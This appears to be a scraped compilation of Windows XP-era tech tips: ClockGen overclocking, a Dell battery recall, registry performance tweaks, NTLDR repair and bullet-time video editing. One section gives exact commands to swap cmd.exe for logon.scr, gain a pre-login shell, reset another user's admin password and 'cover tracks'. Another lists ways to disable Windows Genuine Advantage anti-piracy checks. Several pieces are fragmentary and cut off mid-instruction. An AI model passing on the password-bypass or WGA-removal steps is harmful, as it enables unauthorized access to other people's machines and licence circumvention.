Use ClockGen

The main ClockGen window shows available functions on your system, therefore the layout may depend on your system specifications. If ClockGen is able to find a clock generator on your system, the buttons "PLL Control" and "PLL Setup" are present. You first have to select the clock generator (PLL), so click on "PLL Setup".
In some cases, ClockGen will be able to detect the PLL that is used by your system, especially if your mainboard is equipped with an nVidia chipset. In this case, you won't be able to change the PLL model, and you can directly go to the "PLL Control" step.Otherwise, the PLL selection will be set on "Not specified" by default. Click on "Read Clocks" and you will see the registers dump of your PLL in the IC Dump editor part of the window. However, in order to translate the dump into clocks, ClockGen needs you to tell him what PLL model is on your system, using the PLL drop list. If you don't know exactly what PLL is used by your system, we strongly recommend you follow our directives below to find out what PLL model is used on your system.

PLL selection guide

The PLL, or clock generator, consists in a small integrated circuit on the mainboard. There are 6 main PLL brands : ICS, RealTek, Cypress, IDT, Pericom and Winbond. Each of these brands propose a complete range of PLL models, depending on the chipset and on the desired features.The only 100% reliable way to know what PLL model is used on your system is to look for it on the mainboard and notice the chip reference.
Before opening your system make sure that you can do it without making the warranty void !This is the case of most laptops, so DO NOT OPEN them.
Before you get your flashlight, you can try to find your mainboard in the mainboards list below.If your mainboard does not appear in the list or if you can't open your system, you can try to guess the clock generator family with the chipset. Most PLL models are dedicated to a chipset, and knowing the chipset may help to figure out the PLL model family, especially on ICS chips. On ICS chips with a 6 figures name, the model consists in the 4 first figures. For example, the ICS 954148 belongs to the 9541XX family. The following table may help you figuring out what PLL family your system uses.

If your PLL model is not in ClockGen list, or you just know the family of your PLL, you still can use it because most PLLs in a same family use the same registers to set the Front Side Bus. Only GSB/PCI may vary, and you can ignore them :
Select a PLL in the list that belongs to the same family.
Check "Ignore GSB/PCI". Only the FSB will be reported and modified.

Once you get your PLL model selected, click on "Read Clocks", then open the "PLL Control" window. Notice that the number of sliders depends on the PLL model features. Some models also only support a predefined set of frequencies, and therefore may show a "step-by-step" slider.Once your new clocks are choosen, clock on "Apply Selection" to make them effective. If you want to come back to current values, click on "Reset Selection".

The "Clocks" window shows the current clocks in real time. It is independant from the selection window, so it will tell you if the new clocks were really applied.Notice that the CPU clock may vary if the CPU uses a clock modulation mechanism, like C1E or Speedstep. Load your system if you want the CPU to run at full speed.

Dell Laptops Can Catch Fire

It seems that the "Sony Incident" has a really nasty habit of repeating itself. While in NECs case the issue was related to some faulty PSUs, it seems that Dell has some problems too. And this time, it is all about the batteries again. On one of its websites, Dell warns of a having potential issue with some of its Latitude, Inspiron, Precision and XPS notebook batteries. The notebook batteries have Sony cells and that says it all. 

The following words come directly from their website:

Dell has identified a potential issue associated with certain batteries sold with Dell Latitude, Inspiron, XPS and Dell Precision  Mobile Workstation notebook computers. In cooperation with the U.S. Consumer Product Safety Commission and other regulatory agencies, Dell is voluntarily recalling certain Dell-branded batteries with cells manufactured by Sony and offering free replacements for these batteries. Under rare conditions, it is possible for these batteries to overheat, which could pose a risk of fire.

Potentially affected batteries were sold with the following models of Dell notebook computers or separately as secondary batteries: 

Latitude: D410, D500, D505, D510, D520, D600, D610, D620, D800, D810

Inspiron: 500M, 510M, 600M, 700M, 710M, 6000, 6400, 8500, 8600, 9100, 9200, 9300, 9400, E1505, E1705

Precision: M20, M60, M70, M90

XPS: XPS, XPS Gen2, XPS M170, XPS M1710

In addition, these batteries MAY have also been provided in response to service calls. The batteries were shipped to customers between April 1, 2004 and July 18, 2006. The words DELL and Made in Japan or Made in China or Battery cell made in Japan, Assembled in China or Assembled in Taiwan are printed on the back of the batteries.

So, in case you have a laptop with Sony LiIon cells, make sure that you send back the battery to Dell. The replacement is free of charge and you will end up with a brand new one.

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Raghu and you want the password blah enter this

"net user Raghu blah"

and this changes the password on franks machine to blah and your in.

NOTE: Dont forget to copy the contents of temphack back into the system32 dir to cover tracks...

Menu Delays:

Another minor and easy tweak to remove any delay from menus sliding out. For this you will need to use regedit (open regedit by going to Start -> Run..., then typing 'regedit' and pressing enter). The key you need to change is located in HKEY_CURRENT_USERControl PanelDesktop. The actual key is called MenuShowDelay - all you have to do is change the value to 0. Remember, you will have to re-boot your computer for this tweak to take effect.

GPEDIT.MSC And Autoplay

A great tweaking file that comes with XP is gpedit.msc. Go to Start -> Run... and then type in 'gpedit.msc' and press enter. This is effectively the Policies Editor, and it comes in handy often. For example, if you hate CD autoplay like I do and want to permanently disable it, you can use this tool to do so. Just run gpedit.msc, then go to Computer Configuration -> Administrative Templates -> System. In here you can see the value 'Turn Off Autoplay'. Right-click on it and then click 'Properties'.

Increasing options in add/remove programs:

Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:

This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:

To this:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7

Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".

Automatically Kill Programs At Shutdown:

don't you hate it when, while trying to shut down, you get message boxes telling you that a program is still running? Making it so that Windows automatically kills applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the value 1.

Speeding Up Share Viewing:

This is a great tweak. Before I found it, I was always smashing my head against the table waiting to view shares on other computers. Basically, when you connect to another computer with Windows XP, it checks for any Scheduled tasks on that computer - a fairly useless task, but one that can add up to 30 seconds of waiting on the other end - not good! Fortunately, it's fairly easy to disable this process. First, navigate to HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace in the Registry. Below that, there should be a key called {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Just delete this, and after a restart, Windows will no longer check for scheduled tasks - mucho performance improvement!

Create a Shortcut to Lock Your Computer

Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.

Speed up Internet Explorer 6 Favorites

For some reason, the Favorites menu in IE 6 seems to slow down dramatically sometimes--I've noticed this happens when you install Tweak UI 1.33, for example, and when you use the preview tip to speed up the Start menu. But here's a fix for the problem that does work, though it's unclear why: Just open a command line window (Start button -> Run -> cmd) and type sfc, then hit ENTER. This command line runs the System File Checker, which performs a number of services, all of which are completely unrelated to IE 6. But there you go: It works.

Aspi

WinXP does not come with an Aspi layer. So far almost 90% of the problems with WinXP and CD burning software are Aspi layer problems. After installing WinXP, before installing any CD burning software do a few things first: 1. Open up "My computer" and right click on the CD Recorder. If your CD recorder was detected as a CD recorder there will be a tab called "Recording". On this tab uncheck ALL of the boxes. apply or OK out of it and close my computer. 2. Next install the standard Aspi layer for NT. Reboot when asked. That's is. after the reboot you can install any of the currently working CD recording applications with no problems. If using CD Creator do not install direct CD or Take two as they are currently incompatible but Roxio has promised a fix as soon as XP is released.

NTLDR not found

If you get an error that NTLDR is not found or missing during boot up and it asks you to press any key to restart. This may happen if…..

the floppy or CD does not contain boot files…
Corrupt NTLDR and/or NTDETECT.COM file.
Attempting to upgrade from a Windows 95, 98, or ME computer that is using FAT32 with new hard disk added…
Corrupt boot sector (out f nowhere)…

**If the error message appears when you have inserted a floppy then it does not contain all files or it is corrupt.

**If the error message appears when you are trying to install OS from CD…then check whether you have removed floppy from the drive…or it may be a non-bootable disk.

**This error may occur when a memory stick is inserted and the computer is attempting to boot from it. If you have any type of card reader or flash reader make sure that no memory stick is inside the computer.

Corrupt NTLDR or NTDETECT.COM file

Windows 2000 users

If your computer is using Microsoft Windows 2000 and you are encountering the NTLDR error. Create the below boot.ini file on the floppy diskette drive.

Copy the NTLDR and NTDETECT.COM files from another computer using the same Operating System. Both of these files are located in the root directory of the primary hard disk drive. For example, C:\NTLDR and C:\NTDETECT.COM should be the locations of these files on many computers.

Once these files have been copied to a floppy diskette reboot the computer and copy the NTLDR and NTDETECT.COM files to the root directory of the primary hard disk drive. Below is an example of what commonly should be performed from the A:\> drive.

copy ntldr c:
copy ntdetect.com c:

After the above two files have been copied, remove the floppy diskette and reboot the computer.

Windows XP users

1.Insert the Windows XP bootable CD into the computer.

2.When prompted to press any key to boot from the CD, press any key.

3.Once in the Windows XP setup menu press the "R" key to repair Windows.

4.Log into your Windows installation by pressing the "1" key and pressing enter.

5.You will then be prompted for your administrator password, enter that password.

6.Copy the below two files to the root directory of the primary hard disk. In the below example we are copying these files from the CD-ROM drive letter "E". This letter may be different on your computer.

copy e:\i386\ntldr c:copy e:\i386\ntdetect.com c:\

7.Once both of these files have been successfully copied, remove the CD from the computer and reboot.

Misconfiguration with the boot.ini file

Edit the boot.ini on the root directory of the hard disk drive and verify that it is pointing to the correct location of your Windows Operating System and that the partitions are properly defined.

When upgrading from a Windows 95, 98, or ME computer that is using FAT32

If you are getting this error message while you are attempting to upgrade to Windows 2000 or Windows XP from Windows 95, Windows 98, or Windows ME running FAT32 please try the below recommendations.

1.Boot the computer with a Windows 95, Windows 98 or Windows ME bootable diskette.

2.At the A:\> prompt type:

sys c:

3.After pressing enter you should receive the "System Transferred" message. Once this has been completed remove the floppy diskette and reboot the computer.

Adaware SE, the latest update to adaware's flagship product, is a good product that provides decent protection against many spyware programs, but lacks some important functionality such as the ability to schedule scans. So you've decided to upgrade your pc ? Have you tested the limits of your old one? Beyond purchasing better hardware, there is a way to augment the performance that you already have. Overclocking’s the name, speed at no cost is the game.

Overclocking is the process of increasing the frequency of a device, as the name suggests. If you abide by the rules of common sense and aren't hell-bent on trying to triple the speed of the processor, than you’ll do just fine. There are only two devices in the average system that will benefit from a bump in frequency: the Central Processing Unit, or CPU, and the video card. Let’s concentrate on the CPU for now.

Two things determine your advertised CPU frequency; FSB (Front Side Bus) frequency, and the clock multiplier. You multiply the FSB by the multiplier (hence the name) to determine your resultant CPU frequency. Intel has thwarted overclocking by locking the multipliers on the processors.This leaves your FSB as the only means to overclock. Your FSB frequency is determined by one of two things:

1. Your BIOS. If you own a more recent Abit or Asus motherboard, there is a good chance your BIOS (The most basic configuration level of your PC. Press and hold Delete, or whatever other key is required, on bootup to enter it) supports some form of FSB adjustment. Soft Menu, Jumper Free, and equivalent standards allow you to set the FSB of your CPU within the BIOS.

2. The placement of jumpers on your motherboard. A jumper is a small (1/4 the size of a dime) plastic endcap with a metal insert that connects two of the many short prongs that protrude from your motherboard. There are probably upwards of 25 on your motherboard, and they are usually colored blue, white, or black.

Everything I've explained up until this point was to give you a background on what you are doing. At this point, you are prepared to actually overclock the processor.

Find your motherboard manual. If you don't have it on hardcopy, find it on the Internet at your motherboard manufacturers website and print it out. You need the jumper diagrams for the FSB in particular. (This step can be omitted if your BIOS supports FSB adjustment)
After you've found the diagrams, turn off your computer and remove the case. (This step can be omitted if your BIOS supports FSB adjustment)
Find the location of the FSB jumpers on your motherboard. Your manual should tell you about this. (This step can be omitted if your BIOS supports FSB adjustment)
Use one hand to rearrange the jumpers to the desired frequency as labeled in the jumper diagram. Make sure to put your other hand on the metal part of the case. I suggest you start at 75 MHz if your CPU is based on a 66.6 MHz FSB, 112 MHz if your CPU is based on a 100 MHz FSB, and 140 MHz if your CPU is based on a 133.3 MHz and so on based on the frequency on your FSB.
Reboot the computer. Run a few games, test for stability, etc. If it hard locks, you need more cooling. If it doesn't, put the case back on and run a few more tests. If it is generally unstable, restore your original FSB settings, or add a fan. If everything is peachy, than you can attempt to increase the FSB a few more notches. If the processor refuses to work at a higher frequency regardless of what you do, you’d best leave it at its default frequency.

is an error which can relate to many issues, including software ones. I've even seen suggestions that if such a problem is consistently encountered and recurs even after a hard drive format and fresh install, the use of a 'Zero Fill' utility to remove all traces of previous data from the hard drive can be useful.

But most commonly, this error relates to memory modules which are in the wrong slots or which are incompatible either with each other or the motherboard (cheap, generic RAM modules are notorious for this) or to a power supply unit which is delivering poor or fluctuating voltage levels (again, cheap, generic units are notorious for problems.)

If it's a software cause, look to drivers first. If you have drivers which are not WHQL certified, uninstall them and use Certified versions instead. If you have software which uses software drivers to act as virtual devices (Antivirus and other security software often does this) disable it and see if the problem is corrected. Some of the Symantec auto updating software can cause such problems under certain circumstances, for example. (Replace any such software of course)

Performance Tweaks for Windows Xp

Do you want to make the very best use of your computer's RAM? There are thousands of websites offering performance tweaks for XP and you could spend the next week or more researching the ones you might like to perform, or you can save yourself a lot of bother and read this article. There are hundreds of XP tweaks, but you only need the handful listed here to obtain a significant performance boost. The rest of the tweaks you might find will only give you minor and often indiscernible performance benefits. If you don't have 512MB of RAM or more, there are tweaks here that you can apply anyway, but the best performance boost you'll ever get will be obtained by increasing your RAM.

Tweak #1: Graphical User Interface and Themes

	If you fail to comprehend how the person who decided on the ugly and sickly default Windows XP theme may have actually kept their job at Microsoft then this tweak is for you. Turn off themes and visual effects.
	Disable XP Themes:
	Right click the desktop and select Properties. In the dropdown listbox under Theme:, select Windows Classic and Apply

Tweak #3: Disable Last Access Timestamp

Whenever XP reads a file, it stamps the file with the date and time of the access. This feature has its place but is not required for normal use unless you rely on the date of last access for backup purposes, which is a rare requirement for most backups. Putting a timestamp a file that has just been read means that a write access has to be made to disk, so every time a read is executed, a corresponding write is also executed.

At the command prompt, enter the following then reboot;

FSUTIL behavior set disablelastaccess 1

Those of us who read and write English need to take note of the American spelling of the BEHAVIOR parameter.

To turn timestamps back on, repeat the command but replace the 1 with 0.

Tweak #4: Kernel Paging and Cache Tuning

	256MB RAM is the absolute minimum to take advantage of the changes in this tweak; however to get the best performance you need 512MB or more. Those with faster Pentium 4's should see a significant performance boost from the combination of this tweak plus tweaks 5 and 6.
	You should not perform any registry edits unless you know what you are doing. If you apply this tweak, you should also apply Tweaks #5 & #6.
	The "DisablePagingExecutive" entry in the registry prevents the kernel (the core of the XP OS) from being rolled out to a page file on disk. The effect of this part of the tweak is to cause the OS to cache the Kernel and its entourage to RAM instead of to disk, which makes XP far more responsive.
	The "LargeSystemCache" registry entry forces XP to allocate all but 4MB of system memory, that is system memory, not available RAM, to the file system cache. The remaining 4MB of system memory is used for disk caching, though XP will allocate more memory if it is needed.
	A modern hard disk will transfer sequential data to and from disk at up to 40MB per second, or even faster on some of the more expensive drives, but the LargeSystemCache tweak means that effective transfer speeds of 1GB per second or more can be obtained, depending on the amount of RAM in your system and its operating speed. This is achieved because the LargeSystemCache modification causes the OS to store data in RAM after it is read from disk. It means that the OS is always using the optimum amount of RAM instead of leaving it untouched for future use that may or may not occur. Without this part of the tweak, 200MB or more of RAM in a typical 512MB machine goes completely unused.
	Some I/O intensive applications may take a hit in performance from changing the LargeSystemCache, so this particular component of the tweak should not be applied to a system that is running either SQL Server or Internet Information Server (IIS) because both of those applications perform their own caching.
	Start regedit and navigate to the following key:
	[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager\Memory Management]
	Add these two lines then save the changes and reboot:
	"DisablePagingExecutive"=dword:00000001
	"LargeSystemCache"=dword:00000001
	To see the effects of this part of the tweak, launch a large, memory hungry application. Any of the Microsoft Office suite of applications will do that job nicely. Let the application load then exit from it. Fasten your safety harness then launch the application again.
	A PC with a striped RAID 0 array of two ATA100 7,200 RPM disks with a SiSoft Sandra Drive Index of 28,000 had the two registry changes above applied to it and the Drive Index tripled to an upper mark of 85,000. A similar but scaled down performance increase can be expected for ATA 33/66 disks.

Tweak #5: Separate Window Processes

This tweak provides significantly faster performance and affords greater application stability. This part of the tweak causes multiple instances of the same application to execute in their own process and memory space. Of course, the cost for improved performance and stability is memory since the application and its attendant DLLs are loaded separately for each instance.

If you have 512MB of RAM or more, this part of the tweak is highly recommended because if, say Internet Exploder, crashes then other Internet Exploder instances will remain unaffected.

Start Windows Explorer
Select Tools
Select Folder Options then select the View tab
Check the Launch folder windows in separate process box and Apply

Tweak #6: Processor Scheduling

	This tweak is impossible to explain without getting into the technical ins and outs of binary values, bit pairs and bit masks. Suffice it to say, it forces short, variable length processor timeslices to be allocated to foreground processes three times more often than those timeslices given to background processes.
	Start regedit and navigate to the following key:
	[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control \PriorityControl]
	Change the dword value of Win32PrioritySeparation, save the changes and reboot;
	"Win32PrioritySeparation"=dword:00000026
	The Win32PrioritySeparation value of 26 is hexadecimal, which is 38 decimal.
	As with the cache tuning tweak (#5), this particular tweak should not be applied to a system that is running either SQL Server or Internet Information Server (IIS) unless you are certain that you want to slow down those background processes.

Tweak #7: Turn Off the Indexing Service

	The Windows Search Companion has been very much maligned by the technical community, and with good reason. It is, in my opinion, a classic example of software that both uses resources and operates at speeds that are inversely proportional to the function that it performs and the value it provides. It is slow, ineffectual and tantamount to useless for serious searching because it deliberately ignores certain files and directories without allowing the user to decide what should and should not be searched. In short, the Search Companion is dysfunctional bloatware.
	From a Microsoft Knowledgebase article titled Windows XP may run slowly and you may see multiple symptoms in Windows Task Manager: This issue can occur if the Indexing service is running on the computer. The Indexing service uses the Cidaemon.exe process to index files. The Cidaemon.exe process builds and updates the Index catalog. Additionally, the Cidaemon.exe process typically uses lots of pagefile space and lots of CPU time. The phrase, "typically uses lots of pagefile space and lots of CPU time" looks like a Microsoft marketing droid's spin on the plain English meaning of, "This is bloatware." http://support.microsoft.com/kb/899869/en-us
	Whilst the Windows Search Companion will still function without the indexing service, some performance benefits can be obtained by utilising the indexing service. However the indexing service builds a SQL database of keywords it finds in files. This means that to get at the information compiled by the indexing service, the Search Companion sends an SQL query to the database, which then returns the information to the Search Companion. This can be a frustratingly slow process, even on very fast machines.
	Besides the feature and performance issues with Search Companion, the indexing service works in the background, scouring almost every file that it finds. On a new system, the indexing service can take days to settle down. This is because the service puts a low priority on its work. Despite this low priority, the indexing service can cause serious performance degradation, especially in lower-end machines because the computer's hard disk runs continuously. If you have Office XP, you may find this Microsoft Office KB article of interest.
	A much better searching alternative is to turn off the indexing service and use Agent Ransack by David Vest.

	To disable the indexing service:
	Click Start, Run, type services.msc then press enter or click OK Scroll to the "Indexing Service" in the right-hand pane and double-click it Change the Startup type to Manual or Disable and Apply Click the Stop button and wait for the service to stop then click OK

HOLOGRAPHIC STORAGE: First and most probable replacement "THE HOLOGRAPHIC STORAGE".Holographic storage has been talked about for a long time. Indeed the HOLOGRAPHIC VERSATILE DISK(HVD) is being eagerly awaited by people all around the world. This technology uses lasers to record data in the volume of the medium. The idea is not new but only now it is getting the speed.

HOW DOES IT WORK: A laser beam is split into two, the reference beam ( Red ) and the signal beam ( Green ) . A device called Spatial Light Modulator( SLM ) translates 1's and 0's into an optical pattern of light and dark pixels. These pixels are arranged in an array of about a million bits.

The signal beam and the reference beam intersect in the storage medium which is light sensitive and at this point of intersection a hologram is formed because of a chemical reaction in the medium and gets recorded there. For reading the data only the reference beam is used:it deflects off the hologram and a detector picks up the data in parallel.

Optware corporation of Japan have already come out with the HVD which holds 1TB and is the same in size as a regular optical disc. The estimated costs of the disc are about 100$ Only.The HVD player is about $20,000 Only.
Whatever the short-term outcome, holographic storage will probably become the norm, just as DVDs are at present. Whether this media can be used for long-term data archiving will still depend on the stability of the media. The huge capacity does overcome this in some manner—re-writing a few 4TB discs annually would be much more acceptable than 800-fold, if DVD media was used!

However, here's a great method for creating a Restore Point with
just the click of your mouse, which i came across on the net, recently.

Create a simple two line VBScript file that
uses the WMI (Windows Management Instrumentation) monitor to access
the SystemRestore class and create a Restore Point, like this :

Type these two lines:

Save the file as InstantRestorePoint.vbs.

Now, when you're ready to create an instant Restore Point, all you

Bullet Time is a concept introduced in films and PC Games, here the time is extremely displayed as frozen moments, as it allows the viewer to imperceptibly speedy events(bullet flying).

The Basics of Bullet Time

So how do these bullet time videos works?

Take large number of cameras, arrange in circular arc manner.
Wait for subject to enter this arc
Freeze video feed from first camera.
Take pictures from all cameras except the last one.
Show each of these stills in the video to convey the illusion that time has stopped and the camera is moving around the object.
Continue video from last camera.

Arrange 8cameras focusing at single point. You must have identical cameras between the first and the last one. Response time in clicking buttons of each camera will be different so video recording mode is advisable. The resolution of all the cameras must be same. One second bullet time requires 25 cameras.

The Preliminaries

Once you have finished recording copy them to your PC. Make sure that you name the feeds as camera01,camera02 etc. You need to extract the frames from the movie. Make sure that you have plenty of hard disk space for this.

Start VirtualDub and open the 1^st movie.

Go to FileàSave image sequence and select your option from here.

NOTE: To save time check the box at the bottom to add this to VirtualDub’s job queue.

Repeat this for all feeds.

Hit [F4] to open Job Control Dialog, click start to begin extracting all the frames and go get yourself a snack as the process consumes some time.

Bring it all together

Start Windows Movie Maker.. click on the Import Video option from the column on the left.
In the bottom pane click “Show timeline” to bring up the movies timeline. Use Next/Previous Frame buttons to get the exact frame.
Hit [Ctrl]+[L] to split the chip at this point and delete the latter part. Drag the selected frame from camera01 on to the timeline .
To herald the beginning of the effect you can use Sepia Tone effect(right click on the frame in the timelineàVideo effectsàSepia Tone àadd).This gives you cool Max payne-2 like effect, importantly it masks the colour differences in the frames from each camera.

Do the same for rest of the cameras except the last one.

NOTE: Reduce the timeline a lot so that they are displayed for less time.

Drag the feed from the last camera on to the timeline. You don’t need any of the video before the frozen frame, so navigate to that frame, hit[Ctrl]+[L] to split the clip and delete the first part.

Post Production

Go to VideosàFilters and click Add. From filter list choose Temporal Smoother.This will add some intermediate frames in the bullet time to make it look smoother.From Video
àCompression choose the DivX encoder and save the video.

This copy of Microsoft Windows XP is not genuine - Want to bypass and remove this warning by disabling WGATray.exe ?

Windows XP Pirates have again found workaround methods to bypass the new Microsoft Anti-Piracy effort - Windows Genuine Advantage Notifications that notifies you through annonying pop-up messages if your copy of Windows is not genuine.

The WGA Notifications patch is installed if the user has opted to automatically update Windows via the Windows Update Website or if a XP users manually downloads the latest Windows updates.

A workaround posted on internet WGA install workaround (KB905474) suggests the following:

End the process wgatray.exe in Windows TaskManager and restart Windows XP in safe mode. Now delete the following files:

Delete WgaTray.exe from c:\windowss\ystem32
Delete WgaTray.exe from c:\windows\system32\dllcache

Start Windows Registry editor and delete the folder "WGALOGON" located in the following location:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows NT\CurrentVersion\WinlogonNotify. Delete all references in your registry to WgaTray.exe

Another alternative suggest that three files are installed Windows XP System Folder:

\WINDOWS\system32\WgaLogon.dll
\WINDOWS\system32\WgaTray.exe
\WINDOWS\system32\LegitCheckControl.dll

The wgatray.exe process makes the check for genuine windows software. You can disable WGA by removing the execute bit on WgaLogon.dll. That way, winlogon can't call it as a notification package at boot, and since WgaLogon is responsible for running and maintaining WgaTray.exe, no more tray popups either.

To change the execute bit of WgaLogon.dll, first turn off Simple File Sharing. Now right click the file in Windows Explorer and open the Security Tab. Hit the Advanced button, uncheck the Inherit box at the bottom, hit the Copy button, then hit OK. Go through each listed user/group and remove the "Read & Execute" permission for that file, leaving the "Read" permission as-is.

Hit OK to apply the permission changes and close the file properties dialog. Restart the machine. You can now turn "Use simple file sharing" back on, if you want.

A third alternative posted on the internet suggest that users clear the content of file data.dat located in the following directory:
C:\Documents and Settings\All Users\Application Data\Windows Genuine Advantage\data

Save the data.dat empty file and change the attributes to "Read Only" - Restart you computer. Or start your PC in Safe Mode and delete the following files from Windows system32 folder - wgalogon.dll spmgs.dll wgatray.exe The WGA setup file is in C:\WINDOWS\SoftwareDistribution\ Download\6c4788c9549d437e76e1773a7639582a

If you don't use "Fast User Switching", you can disable the Windows XP Welcome Screen if you are logged in as an Administrator. This will remove the initial WGA Warning Screen:

1. Click on Start -> Control Panel ->User Accounts
2. Click on "Change the way users log on or off"
3. Uncheck "Use the Welcome Screen" - Choose Apply
4. Close the User Accounts window and the Control Panel
5. The next time you reboot your computer, the classic login prompt will be used

To enable Fast User Switching, you must also enable the Use the Welcome screen option. Also, Fast User Switching cannot be used when Offline Files are enabled.

Disable wgatray.exe - Some users are claiming that removing the WGATray.exe (or killing the WGATray.exe process) are working for them. Here's how to search for WGATray.exe file - Screenshot

None of these methods are guaranteed to work and people are just experimenting. Meanwhile Microsoft is not willing to relent to crackers this time and are planning to release an update of WGADiag2.exe utility in the next few days.

WGADiag2 will also fix the problem with registry key permissions may cause the installation of Windows Genuine Advantage Notifications KB905474 to fail from Windows Update:

Here's a manual fix provided by Microsoft. These permissions can be repaired using Registry Editor as follows:

1. Click Start, and then click Run
2. In the Open box, type regedit, and then click OK
3. Expand HKEY_CLASSES_ROOT
4. Locate the subkey HKEY_CLASSES_ROOT\LegitCheckControl.LegitCheck
5. Right-click the subkey and select Permissions….
6. Ensure that Administrators allowed Full Control permission
7. Repeat steps 3-6 for the subkey
HKEY_CLASSES_ROOT\LegitCheckControl.LegitCheck.1

Microsoft has also published a kB article if the Windows Genuine Advantage (WGA) validation check process does not validate successfully on a Microsoft Windows XP-based computer, and you receive one or both of the following error messages:

This problem occurs when you do not have the appropriate permissions for the Windows Genuine Advantage\Data folder. In the Permissions for Users section, make sure that Read & Execute, List Folder Contents and Read permissions are given. If the previous steps fail, start the computer in Safe Mode and rename the %allusersprofile%\Application Data\Windows Genuine Advantage directory.
